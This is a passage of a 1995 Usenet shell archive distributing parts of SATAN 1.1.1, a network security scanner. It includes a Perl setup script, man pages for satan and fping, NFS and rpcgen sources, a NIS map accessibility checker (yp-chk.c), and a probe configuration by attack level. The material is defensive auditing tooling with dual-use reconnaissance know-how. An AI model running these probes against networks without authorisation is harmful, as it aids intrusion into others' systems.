X@all_www= ("netscape", "Mosaic", "xmosaic", "lynx");
X
X#
X# Potential directories to find commands; first, find the user's path...
X$PATH = $ENV{"PATH"};
X
X# additional dirs; *COLON* separated!
X$other_dirs="/usr/ccs/bin:/bin:/usr/bin:/usr/ucb:/usr/bsd:/usr/ucb/bin:/usr/sbin:/usr/etc:/usr/local/bin:/usr/bin/X11:/usr/X11/bin:/usr/openwin/bin";
X
X#
X# split into a more reasonable format. Personal aliases come last.
X@all_dirs = split(/:/, $other_dirs . ":" . $PATH);
X
X#
X# Target shell scripts in question:
X@shell_scripts=("config/paths.pl", "config/paths.sh");
X@perl5_src = <bin/get_targets bin/faux_fping satan bin/*.satan perl/html.pl>;
X
X#
X# Target shell commands in question
X@all_commands=("cc", "cat", "chmod", "cmp", "comm", "cp", "date", "diff",
X "egrep", "expr", "find", "grep", "ls", "mail", "mkdir", "mv", "rm",
X "sed", "sh", "sort", "tftp", "touch", "uniq", "uudecode", "ypcat",
X "strings", "finger", "ftp", "rpcinfo", "rusers", "showmount", "ping",
X "ypwhich", "nslookup", "xhost", "su", "awk", "sed", "test", "whoami",
X "basename", "echo", "file");
X
Xprint "checking to make sure all the target(s) are here...\n";
X
Xfor (@shell_scripts) {
X die "ERROR -- $_ not found!\n" unless -f $_;
X }
X
X# find perl5!
Xprint "Ok, trying to find perl5 now... hang on a bit...\n";
Xfor $dir (@all_dirs) {
X # first, find where it might be; oftentimes you'll see perl,
X # perl4, perl5, etc. in the same dir
X next if (! -d $dir);
X while (<$dir/perl5* $dir/perl*>) {
X if (-x $_) {
X $perl_version=`($_ -v 2> /dev/null) |
X awk '/This is perl, version 5/ { print $NF }'`;
X if ($perl_version) {
X $PERL=$_;
X $pflag="1";
X last;
X }
X }
X last if $pflag;
X }
X last if $pflag;
X }
X
Xdie "\nCan't find perl5! Bailing out...\n" unless $PERL;
Xprint "\nPerl5 is in $PERL\n";
X
Xfor (@perl5_src) { $perl5_src .= "$_ "; }
Xprint "\nchanging the source in: $perl5_src\n";
Xsystem "$PERL -pi -e \"s@^#!.*/perl.*@#!$PERL@;\" $perl5_src";
X
X# make sure things are executable...
Xsystem("chmod u+x $perl5_src");
X
X# find the most preferred www viewer first.
Xfor $www (@all_www) {
X for $dir (@all_dirs) {
X if (!$MOSAIC) {
X if (-x "$dir/$www") {
X $MOSAIC="$dir/$www";

X next;
X }
X }
X }

X }
Xif ($MOSAIC) {
X print "\nHTML/WWW Browser is $MOSAIC\n";
X $upper{"MOSAIC"} = $MOSAIC;
X }
Xelse { print "Cannot find a web browser! SATAN cannot be run except in CLI"; }
X
Xprint "\nSo far so good...\nLooking for all the commands now...\n";
X
Xfor $command (@all_commands) {
X $found="";
X for $dir (@all_dirs) {
X # special case rsh/remsh; if we can find remsh, ignore rsh
X if ($command eq "rsh") {
X # print "looking for rsh/remsh ($dir/$command)\n";
X if (-f "$dir/remsh") {
X # this converts to upper case
X ($upper = $command) =~ y/[a-z]/[A-Z]/;
X $found="true";
X $upper{$upper} = "$dir/remsh";
X print "found $dir/remsh; using this instead of rsh\n";
X last;
X }
X }
X
X # if find the command in one of the directories, print string
X if (-f "$dir/$command") {
X # this converts to upper case
X ($upper = $command) =~ y/[a-z]/[A-Z]/;
X $found="true";
X $upper{$upper} = "$dir/$command";
X # print "found ($upper) $dir/$command\n";
X
X # if it's rsh we're examining, keep looking; else quit
X last unless $command eq "rsh";
X }
X }
X print "\nAEEEIIII...!!! can't find $command\n\n" unless $found;
X }
X
Xprint "\nOk, now doing substitutions on the shell scripts...\n";
Xfor $shell (@shell_scripts) {
X print "Changing paths in $shell...\n";
X die "Can't open $shell\n" unless open(SCRIPT, $shell);
X rename($shell, $shell . '.old');
X die "Can't open $shell\n" unless open(OUT, ">$shell");
X
X #
X # Open up the script, search for lines beginning with
X # stuff like "TEST", "AWK", etc. If the file ends in "pl",
X # assume it's a perl script and change it accordingly
X while (<SCRIPT>) {
X $found = 0;
X for $command (keys %upper) {
X if(/^\$?$command=/) {
X # shell script
X if ($shell !~ /.pl$/) {
X print OUT "$command=$upper{$command}\n";
X }
X # perl script
X else {
X print OUT "\$" . "$command=\"$upper{$command}\";\n";
X }
X $found = 1;
X }
X }
X print OUT $_ if !$found;
X }
X close(SCRIPT);
X close(OUT);
X }
X
X# done...
X
END_OF_FILE
if test 4751 -ne `wc -c <'satan-1.1.1/reconfig'`; then
echo shar: \"'satan-1.1.1/reconfig'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/reconfig'
# end of 'satan-1.1.1/reconfig'
fi
if test -f 'satan-1.1.1/satan.8' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/satan.8'\"
else
echo shar: Extracting \"'satan-1.1.1/satan.8'\" $4800 characters$
sed "s/^X//" >'satan-1.1.1/satan.8' <<'END_OF_FILE'
X.TH SATAN 8
X.SH NAME
Xsatan \- network security scanner
X.SH SYNOPSIS
X.B satan
X.I [options] [primary_target(s)...]
X.SH DESCRIPTION
X.B SATAN
X(Security Administrator Tool for Analyzing Networks) remotely probes
Xsystems via the network and stores its findings in a database. The
Xresults can be viewed with any Level 2 HTML browser that supports the
X.I http
Xprotocol (e.g.
X.B Mosaic, Netscape,
Xetc.)
X.PP
XWhen no
X.I primary_target(s)
Xare specified on the command line,
X.B SATAN
Xstarts up in interactive mode and takes commands from the HTML user
Xinterface.
X.PP
XWhen
X.I primary_target(s)
Xare specified on the command line,
X.B SATAN
Xcollects data from the named hosts, and, possibly, from hosts that it
Xdiscovers while probing a primary host. A primary target can be a host
Xname, a host address, or a network number. In the latter case,
X.B SATAN
Xcollects data from each host in the named network.
X.PP
X.B SATAN
Xcan generate reports of hosts by type, service, vulnerability and by
Xtrust relationship. In addition, it offers tutorials that explain the
Xnature of vulnerabilities and how they can be eliminated.
X.PP
XBy default, the behavior of
X.B SATAN
Xis controlled by a configuration file
X.I (config/satan.cf).
XThe defaults can be overruled via command-line options or via buttons
Xetc. in the HTML user interface.
X.PP
XOptions:
X.IP -a
XAttack level (0=light, 1=normal, 2=heavy). At level 0,
X.B
XSATAN collects information about
X.I RPC
Xservices and from the
X.I DNS.
XAt level 1,
X.B SATAN
Xcollects banners of well-known services such as
X.I telnet, smtp
Xand
X.I ftp,
Xand can usually establish the type of operating system. At level 2,
X.B SATAN
Xdoes a more extensive (but still non-intrusive) scan for services.
XLevel 2 scans may result in console error messages.
X.IP "-A proximity_descent"
XWhile
X.B SATAN
Xextracts information from primary targets, it may discover other
Xhosts. The
X.I proximity_descent
Xcontrols by how much the
X.I attack level
Xdecreases when
X.B SATAN
Xgoes from primary targets to secondary ones, and so on. The
X.I -z
Xoption determines what happens when the
X.I attack level
Xreaches zero.
X.IP "-c 'name=value; name=value...'"
XChange the value of arbitrary
X.B SATAN
Xvariables. Example:
X.sp
X.ti +3
X.DS
X-c 'dont_use_dns = 1; dont_use_nslookup = 1'.
X.DE
X.sp
XThe
X.I -c
Xoption allows you to control configuration and other variables that do
Xnot have their own command-line option. The format is a list of
Xname=value pairs separated by semicolons. Variable names have no dollar
Xprefix, and values are not quoted. Whitespace within values is
Xpreserved.
X.IP "-d database"
XSpecifies the name of the database to read from and to save to (default
X.IR satan_data).
X.sp
XWhen multiple
X.B SATAN
Xprocesses are run in parallel, each process should be given its
Xown database (for example, one database per subnet of 256 hosts). Use
Xthe
X.I merge
Xfacility of the HTML user interface to merge data from different runs.
X.IP -i
XIgnore the contents of the database.
X.IP "-l proximity"
XMaximal proximity level. Primary targets have proximity 0, hosts
Xdiscovered while scanning primaries have proximity level 1, and so on.
X.B SATAN
Xignores all hosts that exceed the maximal proximity level.
X.IP "-o only_attack_these"
XA list of domain names and/or network numbers of hosts that
X.B SATAN
Xis permitted to scan. List elements are separated by whitespace or
Xcommas. Understands the * shell-like wildcard.
X.IP "-O dont_attack_these"
XA list of domain names and/or network numbers that
X.B SATAN
Xshould stay away from. The list has the same format as with the
X.I -o
Xoption.
X.IP -s
XSubnet expansion. For each primary target,
X.B SATAN
Xfinds all alive hosts in the target\'s subnet (a block of 256
Xaddresses).
X.IP "-S status_file"
XWhile collecting data,
X.B SATAN
Xmaintains a status file with the last action taken. The default status
Xfile is
X.I status_file.
X.IP "-t level"
XTimeout level (0 = short, 1 = medium, 2 = long) for each probe.
X.IP -u
XSpecifies that
X.B SATAN
Xis being run from an untrusted host. Access via, for example, the
Xremote shell or network file system services, means that there is a
Xsecurity problem.
X.IP -U
XOpposite of the
X.I -u
Xoption.
X.B SATAN
Xmay be run from a possibly trusted host. Access via, for example, the
Xremote shell or network file system services is not necessarily a
Xproblem.
X.IP -v
XVerbose mode.
X.B SATAN
Xprints on the standard output what it is doing. This is useful for
Xdebugging purposes.
X.IP -V
X.B SATAN
Xprints its version number and terminates.
X.IP -z
XWhen scanning non-primary hosts, continue with
X.I attack level
Xof zero when the level would become negative. The scan continues until

Xthe maximal proximity level is reached.

X.IP -Z
XOpposite of the
X.I -z
Xoption.
X.SH FILES
X.I config/*
Xconfiguration files
X.br
X.I rules/*
Xrule bases
X.br
X.I results/*
Xdata bases
X.SH AUTHORS
XDan Farmer, Wietse Venema
END_OF_FILE
if test 4800 -ne `wc -c <'satan-1.1.1/satan.8'`; then
echo shar: \"'satan-1.1.1/satan.8'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/satan.8'
fi
if test -f 'satan-1.1.1/src/fping/fping.man' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/fping/fping.man'\"
else
echo shar: Extracting \"'satan-1.1.1/src/fping/fping.man'\" $3896 characters$
sed "s/^X//" >'satan-1.1.1/src/fping/fping.man' <<'END_OF_FILE'
X.TH fping l
X.SH NAME
Xfping \- send ICMP ECHO_REQUEST packets to network hosts
X.SH SYNOPSIS
X.B fping
X[ \fIoptions\fR ]
X[ \fIsystems...\fR ]
X
X.SH DESCRIPTION
X.NXR "fping command"
X.NXR "ICMP ECHO_REQUEST"
X
X
X.B fping
Xis a
X.MS ping 8
Xlike program which uses the Internet Control
XMessage Protocol (ICMP) echo request to determine if a host is
Xup.
X.B fping
Xis different from ping in that you can specify any
Xnumber of hosts on the command line, or specify a file containing
Xthe lists of hosts to ping. Instead of trying one host until it
Xtimeouts or replies,
X.B fping
Xwill send out a ping packet and move
Xon to the next host in a round-robin fashion. If a host replies,
Xit is noted and removed from the list of hosts to check. If a host
Xdoes not respond within a certain time limit and/or retry limit it
Xwill be considered unreachable.
X.PP
XUnlike
X.MS ping 8
X,
X.B fping
Xis meant to be used in scripts and its output is easy to parse.
X.SH OPTIONS
X.IP \fB-a\fR 5
XShow systems that are alive.
X.IP \fB-d\fR 5
XUse DNS to lookup address of return ping packet. This allows you to give
Xfping a list of IP addresses as input and print hostnames in the output.
X.IP \fB-e\fR 5
XShow elapsed (round-trip) time of packets
X.IP \fB-f\fR 5
XRead list of system from a file.
X.IP \fB-i\fIn\fR 5
XThe minimum amount of time (in milliseconds) between sending a ping packet to any host (default is 25).
X.IP \fB-q\fR 5
XQuiet. Don't show per host results, just set final exit status.
X.IP \fB-r\fIn\fR 5
XRetry limit (default 3). This is the number of times an attempt at pinging
Xa host will be made, not including the first try.
X.IP \fB-s\fR 5
XDump final statistics.
X.IP \fB-t\fIn\fR 5
XIndividual host timeout in milliseconds (default 2500). This is the
Xminimum number of milliseconds between ping packets directed towards a given
Xhost.
X.IP \fB-u\fR 5
XShow systems that are unreachable.
X.B fping
Xa list of IP addresses as input and have the results printed as hostnames.
X.SH EXAMPLES
XThe following perl script will check a list of hosts and send mail if
Xany are unreachable. It uses the open2 function which allows a program
Xto be opened for reading and writing. fping does not start pinging the
Xlist of systems until it reads EOF, which it gets after INPUT is closed.
XSure the open2 usage is not need in this example, but its a good open2
Xexample none the less.
X.nf
X
X#!/usr/local/bin/perl
Xrequire 'open2.pl';
X
X$MAILTO = "root";
X
X$pid = &open2("OUTPUT","INPUT","/usr/local/bin/fping -u");
X
X@check=("slapshot","foo","foobar");
X
Xforeach(@check) { print INPUT "$_\\n"; }
Xclose(INPUT);
X@output=<OUTPUT>;
X
Xif ($#output != -1) {
X chop($date=`date`);
X open(MAIL,"|mail -s 'unreachable systems' $MAILTO");
X print MAIL "\\nThe following systems are unreachable as of: $date\\n\\n";
X print MAIL @output;
X close MAIL;
X}
X
X.ni
XAnother good example is when you want to perform an action only on hosts
Xthat are currently reachable.
X.nf
X
X#!/usr/local/bin/perl
X
X$hosts_to_backup = `cat /etc/hosts.backup | fping -a`;
X
Xforeach $host (split(/\\n/,$hosts_to_backup)) {
X # do it
X}
X
X.ni
X
X.SH AUTHOR
XRoland J. Schemers III, Stanford University
X.SH DIAGNOSTICS
XExit status is 0 if all the hosts are reachable, 1 if some hosts were
Xunreachable, 2 if any IP addresses were not found, 3 for invalid
Xcommand line arguments, and 4 for a system call failure.
X.SH BUGS
XHa! If there were any I knew of I would have fixed them!
X.SH RESTRICTIONS
XIf certain options are used (i.e, a low value for -i and -t, and a
Xhigh value for -r) it is possible to flood the network. This program
Xmust be installed as setuid root in order to open up a raw socket,
Xor must be run by root. In order to stop mere mortals from hosing the
Xnetwork (when fping is installed setuid root) , normal users can't specify
Xthe following:
X.nf
X
X -i n where n < 10 msec
X -r n where n > 20
X -t n where n < 250 msec
X
X.ni
X.SH SEE ALSO
Xnetstat(1), ping(8), ifconfig(8c)
X
END_OF_FILE
if test 3896 -ne `wc -c <'satan-1.1.1/src/fping/fping.man'`; then
echo shar: \"'satan-1.1.1/src/fping/fping.man'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/fping/fping.man'
fi
if test -f 'satan-1.1.1/src/nfs-chk/mount.x' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/nfs-chk/mount.x'\"
else
echo shar: Extracting \"'satan-1.1.1/src/nfs-chk/mount.x'\" $4565 characters$
sed "s/^X//" >'satan-1.1.1/src/nfs-chk/mount.x' <<'END_OF_FILE'

X * Protocol description for the mount program

X */
X
X#ifndef RPC_HDR
X%#ifndef lint

X%/*static char sccsid[] = "from: @(#)mount.x 1.2 87/09/18 Copyr 1987 Sun Micro";*/
X%/*static char sccsid[] = "from: @(#)mount.x 2.1 88/08/01 4.0 RPCSRC";*/
X%static char rcsid[] = "$Id: mount.x,v 1.1 1994/08/04 19:01:46 wollman Exp $";

X%#endif /* not lint */
X#endif
X

Xconst MNTPATHLEN = 1024; /* maximum bytes in a pathname argument */
Xconst MNTNAMLEN = 255; /* maximum bytes in a name argument */
Xconst FHSIZE = 32; /* size in bytes of a file handle */
X
X/*
X * The fhandle is the file handle that the server passes to the client.
X * All file operations are done using the file handles to refer to a file
X * or a directory. The file handle can contain whatever information the
X * server needs to distinguish an individual file.
X */
Xtypedef opaque fhandle[FHSIZE];
X
X/*
X * If a status of zero is returned, the call completed successfully, and
X * a file handle for the directory follows. A non-zero status indicates
X * some sort of error. The status corresponds with UNIX error numbers.
X */
Xunion fhstatus switch (unsigned fhs_status) {
Xcase 0:
X fhandle fhs_fhandle;
Xdefault:
X void;
X};
X
X/*
X * The type dirpath is the pathname of a directory
X */
Xtypedef string dirpath<MNTPATHLEN>;
X
X/*
X * The type name is used for arbitrary names (hostnames, groupnames)
X */
Xtypedef string name<MNTNAMLEN>;
X
X/*
X * A list of who has what mounted
X */
Xtypedef struct mountbody *mountlist;
Xstruct mountbody {
X name ml_hostname;
X dirpath ml_directory;
X mountlist ml_next;
X};
X
X/*
X * A list of netgroups
X */
Xtypedef struct groupnode *groups;
Xstruct groupnode {
X name gr_name;
X groups gr_next;
X};
X
X/*
X * A list of what is exported and to whom
X */
Xtypedef struct exportnode *exports;
Xstruct exportnode {
X dirpath ex_dir;
X groups ex_groups;
X exports ex_next;
X};
X
Xprogram MOUNTPROG {
X /*
X * Version one of the mount protocol communicates with version two
X * of the NFS protocol. The only connecting point is the fhandle
X * structure, which is the same for both protocols.
X */
X version MOUNTVERS {
X /*
X * Does no work. It is made available in all RPC services
X * to allow server reponse testing and timing
X */
X void
X MOUNTPROC_NULL(void) = 0;
X
X /*
X * If fhs_status is 0, then fhs_fhandle contains the
X * file handle for the directory. This file handle may
X * be used in the NFS protocol. This procedure also adds
X * a new entry to the mount list for this client mounting
X * the directory.
X * Unix authentication required.
X */
X fhstatus
X MOUNTPROC_MNT(dirpath) = 1;
X
X /*
X * Returns the list of remotely mounted filesystems. The
X * mountlist contains one entry for each hostname and
X * directory pair.
X */
X mountlist
X MOUNTPROC_DUMP(void) = 2;
X
X /*
X * Removes the mount list entry for the directory
X * Unix authentication required.
X */
X void
X MOUNTPROC_UMNT(dirpath) = 3;
X
X /*
X * Removes all of the mount list entries for this client
X * Unix authentication required.
X */
X void
X MOUNTPROC_UMNTALL(void) = 4;
X
X /*
X * Returns a list of all the exported filesystems, and which
X * machines are allowed to import it.
X */
X exports
X MOUNTPROC_EXPORT(void) = 5;
X
X /*
X * Identical to MOUNTPROC_EXPORT above
X */
X exports
X MOUNTPROC_EXPORTALL(void) = 6;
X } = 1;
X} = 100005;
END_OF_FILE
if test 4565 -ne `wc -c <'satan-1.1.1/src/nfs-chk/mount.x'`; then
echo shar: \"'satan-1.1.1/src/nfs-chk/mount.x'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/nfs-chk/mount.x'
fi
if test -f 'satan-1.1.1/src/rpcgen/rpc_clntout.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/rpcgen/rpc_clntout.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/rpcgen/rpc_clntout.c'\" $3625 characters$
sed "s/^X//" >'satan-1.1.1/src/rpcgen/rpc_clntout.c' <<'END_OF_FILE'
X/* @(#)rpc_clntout.c 2.1 88/08/01 4.0 RPCSRC */

Xstatic char sccsid[] = "@(#)rpc_clntout.c 1.2 87/06/24 (C) 1987 SMI";
X#endif
X
X/*
X * rpc_clntout.c, Client-stub outputter for the RPC protocol compiler

X * Copyright (C) 1987, Sun Microsytsems, Inc.
X */
X#include <stdio.h>

X#include <string.h>
X#include <stdlib.h>
X#include <unistd.h>
X#include "rpc_parse.h"
X#include "rpc_util.h"
X
X#define DEFAULT_TIMEOUT 25 /* in seconds */
X
Xstatic write_program();
Xstatic printbody();
X
Xvoid
Xwrite_stubs()

X{
X list *l;
X definition *def;
X

X f_print(fout,
X "\n/* Default timeout can be changed using clnt_control() */\n");
X f_print(fout, "static struct timeval TIMEOUT = { %d, 0 };\n",
X DEFAULT_TIMEOUT);

X for (l = defined; l != NULL; l = l->next) {
X def = (definition *) l->val;
X if (def->def_kind == DEF_PROGRAM) {

X write_program(def);

X }
X }
X}
X
X
Xstatic

Xwrite_program(def)
X definition *def;
X{

X version_list *vp;
X proc_list *proc;
X

X for (vp = def->def.pr.versions; vp != NULL; vp = vp->next) {

X for (proc = vp->procs; proc != NULL; proc = proc->next) {

X f_print(fout, "\n");
X ptype(proc->res_prefix, proc->res_type, 1);
X f_print(fout, "*\n");

X pvname(proc->proc_name, vp->vers_num);

X f_print(fout, "(argp, clnt)\n");
X f_print(fout, "\t");
X ptype(proc->arg_prefix, proc->arg_type, 1);
X f_print(fout, "*argp;\n");
X f_print(fout, "\tCLIENT *clnt;\n");
X f_print(fout, "{\n");
X printbody(proc);

X f_print(fout, "}\n\n");
X }
X }
X}
X

Xstatic char *
Xampr(type)
X char *type;
X{
X if (isvectordef(type, REL_ALIAS)) {
X return ("");
X } else {
X return ("&");
X }
X}
X
Xstatic
Xprintbody(proc)
X proc_list *proc;
X{
X f_print(fout, "\tstatic ");
X if (streq(proc->res_type, "void")) {
X f_print(fout, "char ");
X } else {
X ptype(proc->res_prefix, proc->res_type, 0);
X }
X f_print(fout, "res;\n");
X f_print(fout, "\n");
X f_print(fout, "\tmemset((char *)%sres, 0, sizeof(res));\n",
X ampr(proc->res_type));
X f_print(fout,
X "\tif (clnt_call(clnt, %s, xdr_%s, argp, xdr_%s, %sres, TIMEOUT) != RPC_SUCCESS) {\n",
X proc->proc_name, stringfix(proc->arg_type),
X stringfix(proc->res_type), ampr(proc->res_type));
X f_print(fout, "\t\treturn (NULL);\n");

X f_print(fout, "\t}\n");

X if (streq(proc->res_type, "void")) {
X f_print(fout, "\treturn ((void *)%sres);\n",
X ampr(proc->res_type));
X } else {
X f_print(fout, "\treturn (%sres);\n", ampr(proc->res_type));
X }
X}
END_OF_FILE
if test 3625 -ne `wc -c <'satan-1.1.1/src/rpcgen/rpc_clntout.c'`; then
echo shar: \"'satan-1.1.1/src/rpcgen/rpc_clntout.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/rpcgen/rpc_clntout.c'
fi
if test -f 'satan-1.1.1/src/yp-chk/yp-chk.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/yp-chk/yp-chk.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/yp-chk/yp-chk.c'\" $4560 characters$
sed "s/^X//" >'satan-1.1.1/src/yp-chk/yp-chk.c' <<'END_OF_FILE'
X /*
X * Simple NIS map accessibility checker. Prints the first record when it
X * succeeds.
X *

X * Author: Wietse Venema.
X */
X
X#define PORTMAP

X
X#include <sys/types.h>
X#include <sys/socket.h>
X#include <sys/time.h>

X#include <string.h>
X#include <stdlib.h>
X#include <unistd.h>

X#include <stdio.h>
X#include <errno.h>
X#include <netdb.h>
X#include <netinet/in.h>
X#include <arpa/inet.h>
X#include <rpc/rpc.h>

X
X#ifndef INADDR_NONE
X#define INADDR_NONE (-1) /* XXX should be 0xffffffff */
X#endif
X
Xextern int getopt();

Xextern int optind;
Xextern char *optarg;
X

X#include "yp.h"
X
Xstatic struct timeval timeout = {5, 0};
Xstatic int verbose = 0;

Xstatic char *progname;
X
X#define debug if (verbose) printf

X
Xstatic void usage()
X{

X fprintf(stderr, "usage: %s domain map server\n", progname);
X exit(0);
X}
X

X/* perrorexit - print error and exit */
X

Xstatic void perrorexit(text)

Xchar *text;
X{
X perror(text);
X exit(1);
X}
X

X/* make_tcp_client - create client handle to talk to rpc server */
X
Xstatic CLIENT *make_tcp_client(addr, program, version)

Xstruct sockaddr_in *addr;
Xu_long program;
Xu_long version;

X{
X int sock;
X

X debug("Trying to set up TCP client handle\n");
X addr->sin_port = 0;

X sock = RPC_ANYSOCK;
X return (clnttcp_create(addr, program, version, &sock, 0, 0));
X}
X
X/* make_udp_client - create client handle to talk to rpc server */
X
Xstatic CLIENT *make_udp_client(addr, program, version)

Xstruct sockaddr_in *addr;
Xu_long program;
Xu_long version;

X{
X int sock;
X

X debug("Trying to set up UDP client handle\n");
X addr->sin_port = 0;

X sock = RPC_ANYSOCK;
X return (clntudp_create(addr, program, version, timeout, &sock));
X}

X
X/* find_host - look up host information */
X

Xstatic int find_host(sin, host)
Xchar *host;
Xstruct sockaddr_in *sin;

X{
X struct hostent *hp;
X

X /*
X * Look up IP address information. XXX with multi-homed hosts, should try
X * all addresses until we succeed.

X */
X
X memset((char *) sin, 0, sizeof(*sin));
X sin->sin_family = AF_INET;
X
X debug("Looking up host %s\n", host);
X if ((sin->sin_addr.s_addr = inet_addr(host)) != INADDR_NONE) {
X return (1);
X } else if ((hp = gethostbyname(host)) == 0 || hp->h_addrtype != AF_INET) {

X return (0);
X } else {

X memcpy((char *) &sin->sin_addr, hp->h_addr, sizeof(sin->sin_addr));

X return (1);
X }
X}
X

X/* try_map - transfer first map entry */
X
Xstatic int try_map(client, domain, map)
XCLIENT *client;
Xchar *domain;
Xchar *map;
X{
X struct YPreq_nokey nokey;
X struct YPresp_key_val key_val;
X char keybuf[1024];
X char valbuf[1024];
X enum clnt_stat status;
X
X nokey.domain = domain;
X nokey.map = map;
X
X key_val.key.keydat_val = keybuf;
X key_val.key.keydat_len = sizeof(keybuf);
X key_val.val.valdat_val = valbuf;
X key_val.val.valdat_len = sizeof(valbuf);
X
X /*
X * Look up the first entry. Sending the call may fail.
X */
X debug("Trying: %s %s\n", domain, map);
X if ((status = clnt_call(client, YPPROC_FIRST, xdr_YPreq_nokey,
X (char *) &nokey, xdr_YPresp_key_val,
X (char *) &key_val, timeout)) != RPC_SUCCESS) {
X clnt_perrno(status);
X return (0);
X }
X
X /*
X * The call itself may fail (wrong domain or map).
X */
X if (key_val.stat != YP_TRUE) {
X fprintf(stderr, "%s: domain %s map %s: failed\n",
X progname, domain, map);
X exit(1);
X }
X
X /*
X * Show just one entry as proof.
X */
X printf("%.*s\n", key_val.key.keydat_len, key_val.key.keydat_val);

X return (1);
X}
X

Xmain(argc, argv)
Xint argc;
Xchar **argv;
X{

X struct sockaddr_in sin;
X CLIENT *client;
X char *domain;
X char *map;
X char *host;
X int success = 0;
X int opt;

X
X progname = argv[0];
X

X /*
X * Parse JCL.
X */

X while ((opt = getopt(argc, argv, "vt:")) != EOF) {
X switch (opt) {

X case 'v': /* turn on verbose mode */

X verbose = 1;
X break;

X case 't': /* change timeout */
X timeout.tv_sec = atoi(optarg);

X break;
X default:
X usage();

X /* NOTREACHED */
X }
X }
X

X if (argc != optind + 3)
X usage();
X domain = argv[optind];
X map = argv[optind + 1];
X host = argv[optind + 2];
X
X if (find_host(&sin, host) == 0) {
X fprintf(stderr, "%s: unknown host: %s\n", progname, host);
X exit(1);
X }
X
X /*
X * Now try each transport until we succeed.
X */
X if ((client = make_tcp_client(&sin, YPPROG, YPVERS)) == 0
X || (success = try_map(client, domain, map)) == 0)
X if ((client = make_udp_client(&sin, YPPROG, YPVERS)) != 0)
X success = try_map(client, domain, map);
X exit(success == 0);
X}
END_OF_FILE
if test 4560 -ne `wc -c <'satan-1.1.1/src/yp-chk/yp-chk.c'`; then
echo shar: \"'satan-1.1.1/src/yp-chk/yp-chk.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/yp-chk/yp-chk.c'
fi
echo shar: End of archive 9 $of 15$.
cp /dev/null ark9isdone

Wietse Venema

unread,

Apr 13, 1995, 3:00:00 AM4/13/95

Submitted-by: wswi...@wsbs06.win.tue.nl (Wietse Venema)
Posting-number: Volume 47, Issue 134
Archive-name: satan/part10

Environment: UNIX && HTML && Perl 5.0

#! /bin/sh

# This is a shell archive. Remove anything before this line, then feed it
# into a shell via "sh file" or similar. To overwrite existing files,
# type "sh file -c".

# Contents: satan-1.1.1/config/satan.cf
# satan-1.1.1/html/docs/intro.html
# satan-1.1.1/html/docs/satan.probes.html
# satan-1.1.1/html/docs/satan_overview.html
# satan-1.1.1/html/reporting/satan_info_host.pl
# satan-1.1.1/html/reporting/satan_results_danger.pl
# satan-1.1.1/html/tutorials/first_time/analyzing.html
# satan-1.1.1/html/tutorials/vulnerability/NFS_export_to_unprivileged_programs.html
# satan-1.1.1/perl/todo.pl satan-1.1.1/perl/trust.pl
# satan-1.1.1/rules/hosttype satan-1.1.1/src/boot/bootparam_prot.x
# satan-1.1.1/src/fping/CHANGES satan-1.1.1/src/misc/timeout.c
# satan-1.1.1/src/port_scan/tcp_scan.1
# satan-1.1.1/src/rpcgen/rpc_parse.h
# Wrapped by kent@ftp on Wed Apr 12 20:30:10 1995

PATH=/bin:/usr/bin:/usr/ucb:/usr/local/bin:/usr/lbin:$PATH ; export PATH
echo If this archive is complete, you will see the following message:

echo ' "shar: End of archive 10 (of 15)."'
if test -f 'satan-1.1.1/config/satan.cf' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/config/satan.cf'\"
else
echo shar: Extracting \"'satan-1.1.1/config/satan.cf'\" $3125 characters$
sed "s/^X//" >'satan-1.1.1/config/satan.cf' <<'END_OF_FILE'
X#
X# Configuration file for satan; limits, policies, etc. go here
X#
X#
X# version 1, Mon Mar 20 19:16:55 1995, last mod by wietse
X#
X
X#
X# NOTE - "" or 0 means false, in this config file
X#
X
X# Where do we keep the data? This is just a default.
X$satan_data = "satan-data";
X
X# Default attack level (0=light, 1=normal, 2=heavy).
X$attack_level = 0;
X
X# Probes by attack level.
X#
X# ? Means conditional, proposed by rules.todo.
X# With heavy scans, replace 1-9999 by 1-65535 to find all non-standard
X# telnet, ftp, www or gopher servers.
X
X@light = (
X 'dns.satan',

X 'rpc.satan',
X 'showmount.satan?',
X );
X

X@normal = (

X @light,
X 'finger.satan',

X 'tcpscan.satan 70,80,ftp,telnet,smtp,nntp,uucp,6000',

X 'udpscan.satan 53,177',
X 'rusers.satan?',
X 'boot.satan?',

X 'yp-chk.satan?',
X );
X
X@heavy = (

X @normal,
X $heavy_tcp_scan = 'tcpscan.satan 1-9999',
X $heavy_udp_scan = 'udpscan.satan 1-2050,32767-33500',
X '*?',
X );
X

X# status file; keeps track of what SATAN is doing.
X$status_file = "status_file";
X
X#
X# timeout values. -t option chooses one of these.
X#
X$short_timeout = 10;
X$med_timeout = 20;
X$long_timeout = 60;
X
X#
X# Some tools need more time, as specified in the timeouts array.
X#
X%timeouts = (
X 'nfs-chk.satan', 120,
X $heavy_tcp_scan, 120,
X $heavy_udp_scan, 120,
X );
X
X# what signal we send to nuke things when they timeout:
X$timeout_kill = 9;
X
X#
X# Proximity variables; how far out do we attack, does severity go down, etc.
X#
X# How far out from the original target do we attack? Zero means that we only
X# look at the hosts or network that you specify. One means look at neighboring
X# hosts, too. Anything over two is asking for problems, unless you are on the
X# inside of a firewall.
X$max_proximity_level = 0;
X
X# Attack level drops by this much each proximity level change
X$proximity_descent = 1;
X
X# when we go below zero attack, do we stop (0) or go on (1)?
X$sub_zero_proximity = 0;
X
X# a question; do we attack subnets when we nuke a target?
X# 0 = no; 1 = primary target subnet
X$attack_proximate_subnets = 0;
X
X#
X# Does SATAN run on an untrusted host? (0=no; 1=yes, this host may appear
X# in the rhosts, hosts.equiv or NFS export files of hosts that are being

X# probed).
X#
